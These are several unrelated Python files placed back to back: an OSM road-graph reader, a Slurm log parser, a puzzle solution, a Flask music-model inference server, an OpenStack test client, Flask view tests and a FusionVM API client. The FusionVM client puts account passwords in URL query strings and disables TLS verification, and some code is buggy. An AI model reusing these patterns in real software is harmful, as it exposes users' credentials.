print("Download the tile from osm web api ... in progress")
print("Request :", request)
fp = urllib.request.urlopen(request)
if (verbose):
print("OSM Tile downloaded")
if (cache):
if (verbose):
print("Write osm tile in the cache"
)
content = fp.read()
with open(osmFile, 'wb') as f:
f.write(content)
if osmFile.is_file():
if (verbose):
print("OSM tile written in the cache")
fp = urllib.request.urlopen("file://"+str(osmFile)) ## Reload the osm tile from the cache (because fp.read moved the cursor)
return fp
return fp
def read_osm(filename_or_stream, only_roads=True):
"""Read graph in OSM format from file specified by name or by stream object.
Parameters
----------
filename_or_stream : filename or stream object
Returns
-------
G : Graph
Examples
--------
>>> G=nx.read_osm(nx.download_osm(-122.33,47.60,-122.31,47.61))
>>> import matplotlib.pyplot as plt
>>> plt.plot([G.node[n]['lat']for n in G], [G.node[n]['lon'] for n in G], 'o', color='k')
>>> plt.show()
"""
osm = OSM(filename_or_stream)
G = networkx.DiGraph()
## Add ways
for w in osm.ways.values():
if only_roads and 'highway' not in w.tags:
continue
if ('oneway' in w.tags):
if (w.tags['oneway'] == 'yes'):
# ONLY ONE DIRECTION
G.add_path(w.nds, id=w.id, highway=w.tags['highway'])
else:
# BOTH DIRECTION
G.add_path(w.nds, id=w.id, highway=w.tags['highway'])
G.add_path(w.nds[::-1], id=w.id, highway=w.tags['highway'])
else:
# BOTH DIRECTION
G.add_path(w.nds, id=w.id, highway=w.tags['highway'])
G.add_path(w.nds[::-1], id=w.id, highway=w.tags['highway'])
## Complete the used nodes' information
for n_id in G.nodes.keys():
n = osm.nodes[n_id]
G.node[n_id]['lat'] = n.lat
G.node[n_id]['lon'] = n.lon
G.node[n_id]['id'] = n.id
## Estimate the length of each way
for u,v in G.edges():
distance = haversine(G.node[u]['lon'], G.node[u]['lat'], G.node[v]['lon'], G.node[v]['lat'], unit_m = True) # Give a realistic distance estimation (neither EPSG nor projection nor reference system are specified)
G.add_weighted_edges_from([( u, v, distance)], weight='length')
return G
class Node:
def __init__(self, id, lon, lat):
self.id = id
self.lon = lon
self.lat = lat
self.tags = {}
def __str__(self):
return "Node (id : %s) lon : %s, lat : %s "%(self.id, self.lon, self.lat)
class Way:
def __init__(self, id, osm):
self.osm = osm
self.id = id
self.nds = []
self.tags = {}
def split(self, dividers):
# slice the node-array using this nifty recursive function
def slice_array(ar, dividers):
for i in range(1,len(ar)-1):
if dividers[ar[i]]>1:
left = ar[:i+1]
right = ar[i:]
rightsliced = slice_array(right, dividers)
return [left]+rightsliced
return [ar]
slices = slice_array(self.nds, dividers)
# create a way object for each node-array slice
ret = []
i=0
for slice in slices:
littleway = copy.copy( self )
littleway.id += "-%d"%i
littleway.nds = slice
ret.append( littleway )
i += 1
return ret
class OSM:
def __init__(self, filename_or_stream):
""" File can be either a filename or stream/file object."""
nodes = {}
ways = {}
superself = self
class OSMHandler(xml.sax.ContentHandler):
@classmethod
def setDocumentLocator(self,loc):
pass
@classmethod
def startDocument(self):
pass
@classmethod
def endDocument(self):
pass
@classmethod
def startElement(self, name, attrs):
if name=='node':
self.currElem = Node(attrs['id'], float(attrs['lon']), float(attrs['lat']))
elif name=='way':
self.currElem = Way(attrs['id'], superself)
elif name=='tag':
self.currElem.tags[attrs['k']] = attrs['v']
elif name=='nd':
self.currElem.nds.append( attrs['ref'] )
@classmethod
def endElement(self,name):
if name=='node':
nodes[self.currElem.id] = self.currElem
elif name=='way':
ways[self.currElem.id] = self.currElem
@classmethod
def characters(self, chars):
pass
xml.sax.parse(filename_or_stream, OSMHandler)
self.nodes = nodes
self.ways = ways
#count times each node is used
node_histogram = dict.fromkeys( self.nodes.keys(), 0 )
for way in self.ways.values():
if len(way.nds) < 2: #if a way has only one node, delete it out of the osm collection
del self.ways[way.id]
else:
for node in way.nds:
node_histogram[node] += 1
#use that histogram to split all ways, replacing the member set of ways
new_ways = {}
for id, way in self.ways.items():
split_ways = way.split(node_histogram)
for split_way in split_ways:
new_ways[split_way.id] = split_way
self.ways = new_ways
def fetch_roads_OSM(osm_path, acceptedRoads=["motorway","motorway_link","trunk","trunk_link","primary","primary_link","secondary","secondary_link","tertiary","tertiary_link"]):
driver=ogr.GetDriverByName('OSM')
data = driver.Open(osm_path)
sql_lyr = data.ExecuteSQL("SELECT osm_id,highway FROM lines WHERE highway IS NOT NULL")
roads=[]
for feature in sql_lyr:
if feature.GetField('highway') is not None:
osm_id = feature.GetField('osm_id')
shapely_geo = loads(feature.geometry().ExportToWkt())
if shapely_geo is None:
continue
highway=feature.GetField('highway')
if acceptedRoads != []:
if highway in acceptedRoads:
roads.append([osm_id,highway,shapely_geo])
else:
roads.append([osm_id,highway,shapely_geo])
if len(roads) > 0:
road_gdf = gpd.GeoDataFrame(roads,columns=['osm_id','infra_type','geometry'],crs={'init': 'epsg:4326'})
return road_gdf
else:
print('No roads in {}'.format(country))
def line_length(line, ellipsoid='WGS-84'):
'''Length of a line in meters, given in geographic coordinates
Adapted from https://gis.stackexchange.com/questions/4022/looking-for-a-pythonic-way-to-calculate-the-length-of-a-wkt-linestring#answer-115285
Arguments:
line {Shapely LineString} -- a shapely LineString object with WGS-84 coordinates
ellipsoid {String} -- string name of an ellipsoid that `geopy` understands (see
http://geopy.readthedocs.io/en/latest/#module-geopy.distance)
Returns:
Length of line in meters
'''
if line.geometryType() == 'MultiLineString':
return sum(line_length(segment) for segment in line)
return sum(
vincenty(tuple(reversed(a)), tuple(reversed(b)), ellipsoid=ellipsoid).kilometers
for a, b in pairwise(line.coords)
) |
from datetime import datetime
import sys
f = sys.argv[1]
node_map = {}
with open('../all_knls.sinfo.nodes.map',"r") as fin:
for line in fin:
(node, platform) = line.rstrip().split('\t')
node_map[node] = platform
d1p=None
d2p=None
node=None
start = None
end = None
counter = 0
nodes = {}
with open(f,"r") as fin:
for line in fin:
fields = line.rstrip().split(' ')
slurm_file = fields[0]
node = fields[5]
d1 = ' '.join(fields[1:4])
d1p = datetime.strptime("2020 "+d1, '%Y %b %d %H:%M:%S')
if node not in nodes:
nodes[node] = {}
nodes[node]['count'] = 0
nodes[node]['start'] = d1p
nodes[node]['end'] = d1p
nodes[node]['count'] += 1
#short version
#d1 = ' '.join(fields[:3])
#d1p = datetime.strptime("2020 "+d1, '%Y %b %d %H:%M:%S')
#fields = fin.readline().split(' ')
#d2 = fields[9]
#d2p=datetime.strptime(d2, '%Y-%m-%dT%H:%M:%S')
#node = fields[6]
#dd=d2p-d1p
platforms = {}
for platform in ['KNL','SKX']:
platforms[platform]={}
platforms[platform]['count']=0
platforms[platform]['hours']=0
for node in nodes.keys():
vals = nodes[node]
dd = vals['end'] - vals['start']
count = vals['count']
sec = dd.total_seconds()
hours = sec / 3600
days = sec / 86400
platform = node_map[node]
platforms[platform]['count'] += count
platforms[platform]['hours'] += hours
sys.stdout.write("%s\t%s\t%d\t%s\t%s\t%s\t%s\t%s\n" % (node, platform, count, hours, days, sec, vals['start'], vals['end']))
for platform in platforms.keys():
vals = platforms[platform]
sys.stderr.write("%s\t%d\t%d\n" % (platform, vals['count'], vals['hours']))
|
#Queens attack 1d
def queenAttack(board , qr , qc):
n = len(board)
obs = False
count = 0
#right
for i in range(qr + 1 , n):
print('r: ' ,i)
if board[i] == 0:
count += 1
#board[i] = 'q'
#left
for i in range(1 , qr):
if board[i] == 0:
print('l: ' , i)
count += 1
#board[i] = 'q'
#check diagonals
for i in range(1 , n):
if abs(qr - i) != abs(board[qr] - board[i]):
count += 1
print(qr , i , board[qr] , board[i])
if qr + 1 < n:
qr += 1
board[qr] = qc
#print(count)
return count
n,k = input().strip().split(' ')
n,k = [int(n),int(k)]
board = [0] * (n + 1)
qr,qc = input().strip().split(' ')
qr,qc = [int(qr),int(qc)]
#print(board)
board[qr] = qc
count = 0
#print(board)
for a in range(k):
r , c = input().split(' ')
r , c = int(r) , int(c)
board[r] = c
count = queenAttack(board , qr , qc)
print(count)
|
import json
from flask import Flask
from flask import request
from flask.helpers import make_response
from flask.json import JSONDecoder, jsonify
from torch.utils import data
from BFT.utils import cuda_variable
from flask_cors import CORS
from BFT.handlers import DecoderPrefixHandler
app = Flask(__name__)
CORS(app)
"""
@author: Gaetan Hadjeres
"""
from BFT.positional_embeddings import PositionalEmbedding
import importlib
import os
import shutil
from datetime import datetime
import click
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel
from BFT.getters import get_data_processor, get_dataloader_generator, get_decoder, get_sos_embedding, get_positional_embedding
DEBUG = False
@click.command()
@click.argument('cmd')
@click.option('-o', '--overfitted', is_flag=True)
@click.option('-c', '--config', type=click.Path(exists=True))
@click.option('-n', '--num_workers', type=int, default=0)
def launcher(cmd, overfitted, config, num_workers):
# === Set shared parameters
# only use 1 GPU for inference
print(cmd)
assert cmd == 'serve'
world_size = 1
# Load config as dict
config_path = config
config_module_name = os.path.splitext(config)[0].replace('/', '.')
config = importlib.import_module(config_module_name).config
# Compute time stamp
if config['timestamp'] is not None:
timestamp = config['timestamp']
else:
timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
config['timestamp'] = timestamp
# Create or retreive model_dir
model_dir = os.path.dirname(config_path)
print(f'Using {world_size} GPUs')
mp.spawn(main,
args=(overfitted, config, num_workers, world_size, model_dir),
nprocs=world_size,
join=True)
def main(rank, overfitted, config, num_workers, world_size, model_dir):
# === Init process group
os.environ['MASTER_ADDR'] = 'localhost'
# os.environ['MASTER_PORT'] = '12355'
# os.environ['MASTER_PORT'] = '12356'
os.environ['MASTER_PORT'] = '12357'
dist.init_process_group(backend='nccl', world_size=world_size, rank=rank)
torch.cuda.set_device(rank)
device = f'cuda:{rank}'
# === Decoder ====
# dataloader generator
dataloader_generator = get_dataloader_generator(
dataset=config['dataset'],
dataloader_generator_kwargs=config['dataloader_generator_kwargs'])
# data processor
global data_processor
data_processor = get_data_processor(
dataloader_generator=dataloader_generator,
data_processor_type=config['data_processor_type'],
data_processor_kwargs=config['data_processor_kwargs'])
# positional embedding
positional_embedding_target: PositionalEmbedding = get_positional_embedding(
dataloader_generator=dataloader_generator,
positional_embedding_dict=config['positional_embedding_dict'])
# sos embedding
sos_embedding = get_sos_embedding(
dataloader_generator=dataloader_generator,
sos_embedding_dict=config['sos_embedding_dict'])
encoder_decoder = get_decoder(
data_processor=data_processor,
dataloader_generator=dataloader_generator,
positional_embedding=positional_embedding_target,
sos_embedding=sos_embedding,
decoder_type=config['decoder_type'],
decoder_kwargs=config['decoder_kwargs'],
training_phase=False)
encoder_decoder.to(device)
encoder_decoder = DistributedDataParallel(
module=encoder_decoder,
device_ids=[rank],
output_device=rank,
# find_unused_parameters=True
)
global handler
handler = DecoderPrefixHandler(model=encoder_decoder,
model_dir=model_dir,
dataloader_generator=dataloader_generator)
# Load model
if overfitted:
handler.load(early_stopped=False, recurrent=True)
else:
handler.load(early_stopped=True, recurrent=True)
local_only = False
if local_only:
# accessible only locally:
app.run(threaded=True)
else:
# accessible from outside:
port = 5000 if DEBUG else 8080
app.run(host='0.0.0.0',
port=port,
threaded=True,
debug=DEBUG,
use_reloader=False)
@app.route('/ping', methods=['GET'])
def ping():
return 'pong'
@app.route('/invocations', methods=['POST'])
def invocations():
# === Parse request ===
# common components
d = json.loads(request.data)
case = d['case']
assert case in ['start', 'continue']
if DEBUG:
print(d)
notes = d['notes']
selected_region = d['selected_region']
clip_start = d['clip_start']
tempo = d['tempo']
beats_per_second = tempo / 60
seconds_per_beat = 1 / beats_per_second
# two different parsing methods
if case == 'start':
num_max_generated_events = 15
(x, metadata_dict, unused_before, before, after, unsused_after,
clip_start,
selected_region) = ableton_to_tensor(notes, clip_start,
seconds_per_beat,
selected_region)
elif case == 'continue':
num_max_generated_events = 30
json_notes = d['notes']
event_start = d['next_event_start']
event_end = d['next_event_end']
x, num_events_before_padding = json_to_tensor(json_notes,
seconds_per_beat,
event_start, event_end,
selected_region)
else:
raise NotImplementedError
global handler
x_inpainted, generated_region, done = handler.inpaint(
x=x,
metadata_dict=metadata_dict,
num_max_generated_events=None, # TODO change
temperature=1.,
top_p=0.98,
top_k=0)
new_x = torch.cat([
unused_before[0], before[0], generated_region[0], after[0],
unsused_after[0]
],
dim=0).detach().cpu()
# TODO use done to rescale
ableton_notes, track_duration = tensor_to_ableton(
new_x,
start_time=clip_start,
beats_per_second=beats_per_second,
rescale=False)
ableton_notes_region, _ = tensor_to_ableton(
generated_region[0].detach().cpu(),
start_time=selected_region['start'],
expected_duration=(selected_region['end'] - selected_region['start']) *
seconds_per_beat,
beats_per_second=beats_per_second,
rescale=done)
after_region = torch.cat([after[0], unsused_after[0]],
dim=0).detach().cpu()
ableton_notes_after_region, _ = tensor_to_ableton(
after_region,
start_time=selected_region['end'], # TODO WRONG!,
beats_per_second=beats_per_second)
print(f'albeton notes: {ableton_notes}')
print(f'region start: {ableton_notes_region}')
d = {
'id': d['id'],
'notes': ableton_notes,
'track_duration': track_duration,
'done': done,
'selected_region': selected_region,
'notes_region': ableton_notes_region,
'notes_after_region': ableton_notes_after_region,
'clip_start': clip_start,
'clip_id': d['clip_id'],
'clip_end': d['clip_end'],
'detail_clip_id': d['detail_clip_id'],
'tempo': d['tempo']
}
return jsonify(d)
def preprocess_input(x, event_start, event_end):
"""
Args:
x ([type]): original sequence (num_events, num_channels )
event_start ([type]): indicates the beginning of the recomposed region
event_end ([type]): indicates the end of the recomposed region
note_density ([type]): [description]
Returns:
[type]: [description]
"""
global data_processor
global handler
# add batch_dim
# only one proposal for now
num_examples = 1
x = x.unsqueeze(0).repeat(num_examples, 1, 1)
_, x, _ = data_processor.preprocess(x)
total_length = x.size(1)
# if x is too large
# x is always >= 1024 since we pad
num_events_model = handler.dataloader_generator.sequences_size
if total_length > num_events_model:
# slice
slice_begin = max((event_start - num_events_model // 2), 0)
slice_end = slice_begin + num_events_model
x_beginning = x[:, :slice_begin]
x_end = x[:, slice_end:]
x = x[:, slice_begin:slice_end]
else:
x_beginning = torch.zeros(1, 0).to(x.device)
x_end = torch.zeros(1, 0).to(x.device)
offset = slice_begin
masked_positions = torch.zeros_like(x).long()
masked_positions[:, event_start - offset:event_end - offset] = 1
# the last time shift should be known:
# TODO check this condition : should be done in conjunction with setting the correct duration of the inpainted region
# if event_end < total_length:
# masked_positions[:, event_end - offset - 1, 3] = 0
return (x_beginning, x, x_end), masked_positions, slice_begin
def json_to_tensor(json_note_list, seconds_per_beat, event_start, event_end,
selected_region):
# TODO!
d = {
'pitch': [],
'time': [],
'duration': [],
'velocity': [],
'muted': [],
}
# pitch time duration velocity muted
for n in json_note_list:
for k, v in n.items():
d[k].append(v)
# we now have to sort
l = [[p, t, d, v] for p, t, d, v in zip(d['pitch'], d['time'],
d['duration'], d['velocity'])]
l = sorted(l, key=lambda x: (x[1], -x[0]))
d = dict(pitch=torch.LongTensor([x[0] for x in l]),
time=torch.FloatTensor([x[1] for x in l]),
duration=torch.FloatTensor([max(float(x[2]), 0.05) for x in l]),
velocity=torch.LongTensor([x[3] for x in l]))
# multiply by tempo
d['time'] = d['time'] * seconds_per_beat
d['duration'] = d['duration'] * seconds_per_beat
# compute time_shift
d['time_shift'] = torch.cat(
[d['time'][1:] - d['time'][:-1],
torch.zeros(1, )], dim=0)
# Recompute time shifts in the selected_region
# Set correct time shifts and compute masked_positions
# TODO THIS CAN BE NEGATIVE!
start_time = d['time'][event_start]
end_time = selected_region['end'] * seconds_per_beat
num_events_to_compose = event_end - event_start
d['time_shift'][event_start:event_end] = ((end_time - start_time.item()) /
num_events_to_compose)
global handler
num_events_before_padding = d['pitch'].size(0)
# to numpy :(
d = {k: t.numpy() for k, t in d.items()}
# delete unnecessary entries in dict
del d['time']
# TODO over pad?
d = handler.dataloader_generator.dataset.add_start_end_symbols(
sequence=d, start_time=0, sequence_size=1024 + 512)
sequence_dict = handler.dataloader_generator.dataset.tokenize(d)
# to pytorch :)
sequence_dict = {k: torch.LongTensor(t) for k, t in sequence_dict.items()}
x = torch.stack(
[sequence_dict[e] for e in handler.dataloader_generator.features],
dim=-1).long()
return x, num_events_before_padding
def ableton_to_tensor(ableton_note_list,
clip_start,
seconds_per_beat,
selected_region=None):
"""[summary]
Args:
ableton_note_list ([type]): [description]
note_density ([type]): [description]
clip_start ([type]): [description]
selected_region ([type], optional): [description]. Defaults to None.
Returns:
x [type]: x is at least of size (1024, 4), it is padded if necessary
"""
d = {
'pitch': [],
'time': [],
'duration': [],
'velocity': [],
'muted': [],
}
mod = -1
# pitch time duration velocity muted
ableton_features = ['pitch', 'time', 'duration', 'velocity', 'muted']
if selected_region is not None:
start_time = selected_region['start']
end_time = selected_region['end']
for msg in ableton_note_list:
if msg == 'notes':
pass
elif msg == 'note':
mod = 0
elif msg == 'done':
break
else:
if mod >= 0:
d[ableton_features[mod]].append(msg)
mod = (mod + 1) % 5
# we now have to sort
l = [[p, t, d, v] for p, t, d, v in zip(d['pitch'], d['time'],
d['duration'], d['velocity'])]
l = sorted(l, key=lambda x: (x[1], -x[0]))
d = dict(pitch=torch.LongTensor([x[0] for x in l]),
time=torch.FloatTensor([x[1] for x in l]),
duration=torch.FloatTensor([max(float(x[2]), 0.05) for x in l]),
velocity=torch.LongTensor([x[3] for x in l]))
# compute event_start, event_end
# num_notes is the number of notes in the original sequence
epsilon = 1e-4
num_notes = d['time'].size(0)
event_start, event_end = None, None
if selected_region is not None:
i = 0
flag = True
while flag:
if i == num_notes:
event_start = num_notes
break
if d['time'][i].item() >= start_time - epsilon:
flag = False
event_start = i
else:
i = i + 1
i = 0
flag = True
while flag:
if i == num_notes:
event_end = num_notes
break
if i > d['time'].size(0):
flag = False
event_end = i
elif d['time'][i].item() >= end_time - epsilon:
flag = False
event_end = i
else:
i = i + 1
# multiply by tempo
d['time'] = d['time'] * seconds_per_beat
d['duration'] = d['duration'] * seconds_per_beat
# compute time_shift
d['time_shift'] = torch.cat(
[d['time'][1:] - d['time'][:-1],
torch.zeros(1, )], dim=0)
# Remove selected region and replace it with a placeholder
# end_time must be the first starting time after the selected region
if event_end < num_notes:
end_time = d['time'][event_end].item() / seconds_per_beat
# update_selected_region
selected_region['end'] = end_time - 1e-2
placeholder_duration = (end_time - start_time) * seconds_per_beat
placeholder_duration = cuda_variable(torch.Tensor([placeholder_duration]))
global data_processor
placeholder, placeholder_duration_token = data_processor.compute_placeholder(
placeholder_duration=placeholder_duration, batch_size=1)
if event_start > 0:
last_time_shift_before = start_time * seconds_per_beat - d['time'][
event_start - 1].item()
# delete unnecessary entries in dict
del d['time']
before = {k: v[:event_start] for k, v in d.items()}
after = {k: v[event_end:] for k, v in d.items()}
global handler
# format and pad
# If we need to pad "before"
if event_start < data_processor.num_events_before:
before = {k: t.numpy() for k, t in before.items()}
before = handler.dataloader_generator.dataset.add_start_end_symbols(
sequence=before,
start_time=event_start - data_processor.num_events_before,
sequence_size=data_processor.num_events_before)
if event_start > 0:
before['time_shift'][-1] = last_time_shift_before
before = handler.dataloader_generator.dataset.tokenize(before)
before = {k: torch.LongTensor(t) for k, t in before.items()}
before = torch.stack(
[before[e] for e in handler.dataloader_generator.features],
dim=-1).long()
before = cuda_variable(before)
unused_before = before[:0]
else:
before = {k: t.numpy() for k, t in before.items()}
before = handler.dataloader_generator.dataset.add_start_end_symbols(
sequence=before, start_time=0, sequence_size=event_start)
before['time_shift'][-1] = last_time_shift_before
before = handler.dataloader_generator.dataset.tokenize(before)
before = {k: torch.LongTensor(t) for k, t in before.items()}
before = torch.stack(
[before[e] for e in handler.dataloader_generator.features],
dim=-1).long()
before = cuda_variable(before)
unused_before, before = (before[:-data_processor.num_events_before],
before[-data_processor.num_events_before:])
# same for "after"
num_notes_after = after['pitch'].size(0)
# After cannot contain 'START' symbol
after = {k: t.numpy() for k, t in after.items()}
after = handler.dataloader_generator.dataset.add_start_end_symbols(
sequence=after,
start_time=0,
sequence_size=max(num_notes_after, data_processor.num_events_after))
after = handler.dataloader_generator.dataset.tokenize(after)
after = {k: torch.LongTensor(t) for k, t in after.items()}
after = torch.stack(
[after[e] for e in handler.dataloader_generator.features],
dim=-1).long()
after = cuda_variable(after)
after, unused_after = (after[:data_processor.num_events_after],
after[data_processor.num_events_after:])
middle_length = (data_processor.dataloader_generator.sequences_size -
data_processor.num_events_before -
data_processor.num_events_after - 2)
# add batch dim
unused_before = unused_before.unsqueeze(0)
before = before.unsqueeze(0)
after = after.unsqueeze(0)
unused_after = unused_after.unsqueeze(0)
# create x:
x = torch.cat([
before, placeholder, after,
data_processor.sod_symbols.unsqueeze(0).unsqueeze(0),
cuda_variable(
torch.zeros(1, middle_length, data_processor.num_channels))
],
dim=1).long()
# if "before" was padded
if event_start < data_processor.num_events_before:
# (then event_start is the size of "before")
before = before[:, -event_start:]
# slicing does not work in this case
if event_start == 0:
before = before[:, :0]
# if "after" was padded:
if num_notes_after < data_processor.num_events_after:
after = after[:, :num_notes_after]
# update clip start if necessary
if clip_start > start_time:
clip_start = start_time
metadata_dict = dict(original_sequence=x,
placeholder_duration=placeholder_duration,
decoding_start=data_processor.num_events_before +
data_processor.num_events_after + 2)
return x, metadata_dict, unused_before, before, after, unused_after, clip_start, selected_region
def tensor_to_ableton(tensor,
start_time,
beats_per_second,
expected_duration=None,
rescale=False):
"""
convert back a tensor to ableton format.
Then shift all notes by clip start
Args:
tensor (num_events, num_channels)):
clip_start
"""
num_events, num_channels = tensor.size()
if num_events == 0:
return [], 0
# channels are ['pitch', 'velocity', 'duration', 'time_shift']
notes = []
tensor = tensor.detach().cpu()
global handler
index2value = handler.dataloader_generator.dataset.index2value
timeshifts = torch.FloatTensor(
[index2value['time_shift'][ts.item()] for ts in tensor[:, 3]])
time = torch.cumsum(timeshifts, dim=0)
if rescale:
actual_duration = time[-1].item()
rescaling_factor = expected_duration / actual_duration
else:
rescaling_factor = 1
time = (torch.cat([torch.zeros(
(1, )), time[:-1]], dim=0) * rescaling_factor * beats_per_second +
start_time)
for i in range(num_events):
note = dict(pitch=index2value['pitch'][tensor[i, 0].item()],
time=time[i].item(),
duration=index2value['duration'][tensor[i, 2].item()] *
beats_per_second * rescaling_factor,
velocity=index2value['velocity'][tensor[i, 1].item()],
muted=0)
notes.append(note)
track_duration = time[-1].item() + (notes[-1]['duration'].item() *
rescaling_factor * beats_per_second)
return notes, track_duration
if __name__ == "__main__":
launcher()
# Response format
# {'id': '14', 'notes': ['notes', 10, 'note', 64, 0.5, 0.25, 100, 0, 'note', 64, 0.75, 0.25, 100, 0, 'note', 64, 1, 0.25, 100, 0, 'note', 65, 0.25, 0.25, 100, 0, 'note', 68, 1, 0.25, 100, 0, 'note', 69, 0, 0.25, 100, 0, 'note', 69, 0.75, 0.25, 100, 0, 'note', 69, 1.25, 2, 100, 0, 'note', 70, 0.5, 0.25, 100, 0, 'note', 71, 0.25, 0.25, 100, 0, 'done'], 'duration': 4} |
# Copyright 2019 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
from tempest import config
from tempest.lib import auth
from tempest.lib.common import rest_client
CONF = config.CONF
LOG = logging.getLogger(__name__)
class CyborgRestClient(rest_client.RestClient):
"""Client class for accessing the cyborg API."""
DP_URL = '/device_profiles'
def _response_helper(self, resp, body=None):
if body:
body = json.loads(body)
return rest_client.ResponseBody(resp, body)
def create_device_profile(self, body):
body = json.dump_as_bytes(body)
resp, body = self.post(self.DP_URL, body=body)
return self._response_helper(resp, body)
def delete_device_profile(self, name):
url = self.DP_URL + "/" + name
resp, body = self.delete(url)
return self._response_helper(resp, body)
def list_device_profile(self):
resp, body = self.get(self.DP_URL)
return self._response_helper(resp, body)
def get_auth_provider(credentials, scope='project'):
default_params = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests
}
if isinstance(credentials, auth.KeystoneV3Credentials):
auth_provider_class, auth_url = \
auth.KeystoneV3AuthProvider, CONF.identity.uri_v3
else:
auth_provider_class, auth_url = \
auth.KeystoneV2AuthProvider, CONF.identity.uri
_auth_provider = auth_provider_class(credentials, auth_url,
scope=scope,
**default_params)
_auth_provider.set_auth()
return _auth_provider
|
"""Message View tests."""
# run these tests like:
#
# FLASK_ENV=production python -m unittest test_message_views.py
import os
from unittest import TestCase
from models import db, connect_db, Message, User, Follows
# BEFORE we import our app, let's set an environmental variable
# to use a different database for tests (we need to do this
# before we import our app, since that will have already
# connected to the database
os.environ['DATABASE_URL'] = "postgresql:///warbler-test"
from app import app, CURR_USER_KEY, do_logout
db.create_all()
# Don't have WTForms use CSRF at all, since it's a pain to test
app.config['WTF_CSRF_ENABLED'] = False
class UserViewTestCase(TestCase):
"""test app view functions"""
def setUp(self):
"""Clear data and give test info"""
User.query.delete()
Message.query.delete()
Follows.query.delete()
self.client = app.test_client()
self.testuser = User.signup(username="testuser",
email="test@test.com",
password="testuser",
image_url=None)
db.session.commit()
def test_home_(self):
"""Does the home route return the home page with logged in user"""
# Since we need to change the session to mimic logging in,
# we need to use the changing-session trick:
with self.client as c:
with c.session_transaction() as sess:
sess[CURR_USER_KEY] = self.testuser.id
resp = c.get('/')
self.assertEqual(resp.status_code,200)
def test_signup(self):
"""Can the user signup properly"""
with self.client as c:
data={
'username':'test_signup',
'password':'123456',
'email':'test@email.com'
}
resp = c.post('/signup',data=data)
self.assertEqual(resp.status_code,302)
user = User.authenticate(username='test_signup', password='123456')
self.assertTrue(user != False)
def test_login(self):
"""Can the user login properly"""
# do_logout()
with self.client as c:
data={
'username':'test_user',
'password':'testuser'
}
resp = c.post('/login',data=data)
self.assertEqual(resp.status_code,200)
self.assertIn(b'testuser',resp.data.lower())
def test_logout(self):
"""CAn the user logout properly"""
with self.client as c:
resp = c.get('/logout', follow_redirects=True)
self.assertEqual(resp.status_code,200)
self.assertIn(b'new to warbler?',resp.data.lower())
def test_delete_user(self):
"""Can the user delete their account"""
with self.client as c:
with c.session_transaction() as sess:
sess[CURR_USER_KEY] = self.testuser.id
resp = c.post('/users/delete')
self.assertEqual(resp.status_code, 302)
self.assertIsNone(User.query.get(self.testuser.id))
|
import os
import string
import sys
import requests
import json
from xml.etree import ElementTree
class cwatchAPI(object):
def __init__(self,usr,passwd):
self.sess = requests.session()
self.url = 'https://www.fusionvm.com/rest/v2/api/'
self.url2 = 'https://api.fusionvm.com/'
self.usr = usr
self.passwd = passwd
def getData(self,v,url):
ndata = ""
if v == "2":
data = self.sess.get(self.url + url, auth=(self.usr,self.passwd), verify=False)
if v == "1":
data = self.sess.get(self.url2 + url)
for i in data.iter_content(chunk_size=1024):
if i:
ndata += i
return ndata
def getXml(self,v,url):
ndata = self.getData(v,url)
#print ndata
data = ElementTree.fromstring(ndata)
return data
def getJson(self,v,api):
data = json.loads(self.getData(v,api))
return data
def clientstats(self):
data = self.getJson("2",'clientstats')
return data
def exposurestats(self):
data = self.getJson("2",'exposurestats')
return data
def vmserverstats(self):
data = self.getJson("2",'vmserverstats')
return data
def apicompany(self):
data = self.getJson("2",'Company')
return data
def apijobs(self,args=None):
if not args:
data = self.getJson("2",'jobs')
else:
data = self.getJson("2",'jobs/%s' % args)
return data
#API DOENST WORK YET FOR CW
def apinodes(self,id):
data = self.getJson("2",'Nodes/nodeid=%s' % id)
return data
def apiclientstats(self,id):
data = self.getJson("2",'ClientStats/nodeid=%s' % id)
return data
def apitrends(self,id,months):
data = self.getJson("2",'ClientStats/vulntrends?nodeid=%s&numberPriorMonths=%s' % (id,months))
return data
def report(self,mtype="list",args=""):
#startdata,enddate,hoursback,companyid
if mtype == "list":
if args != "":
data = self.getXml("1",'/report/list.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
else:
data = self.getXml("1",'/report/list.aspx?emailaddress=%s&password=%s' % (self.usr,self.passwd))
#jobid,seqnumber
if mtype == "queue":
data = self.getXml("1",'/report/queue.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
#guid
if mtype == "download":
data = self.getData("1",'/report/download.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
return data
def mssplist(self):
data = self.getXml("1",'/mssp/company_list.aspx?emailaddress=%s&password=%s' % (self.usr,self.passwd))
lst = data.findall("Companies/Company")
c = []
for i in lst:
d = {"Name":"","ID":""}
d["Name"] = i.find("CompanyName").text
d["ID"] = i.attrib.get("CompanyID")
c.append(d)
d = ""
return c
#doesnt seem to work
def vmserverlist(self,comid):
data = self.getXml("1",'/company/vmservers_list.aspx?emailaddress=%s&password=%s&companyid=%s' % (self.usr,self.passwd,comid))
lst = data.findall("VMServers/VMServer")
c = []
for i in lst:
d = {"Name":"","ID":""}
d["Name"] = i.find("VMServerName").text
d["ID"] = i.attrib.get("VMServerID")
c.append(d)
d = ""
return c
def job(self,mtype="status",jobid=""):
#need to add create function
if mtype == "status":
data = self.getXml("1",'/job/status.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
if mtype == "start":
data = self.getXml("1",'/job/start.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
if mtype == "pause":
data = self.getXml("1",'/job/pause.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
if mtype == "stop":
data = self.getXml("1",'/job/stop.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
return data
def xsd(self,mtype):
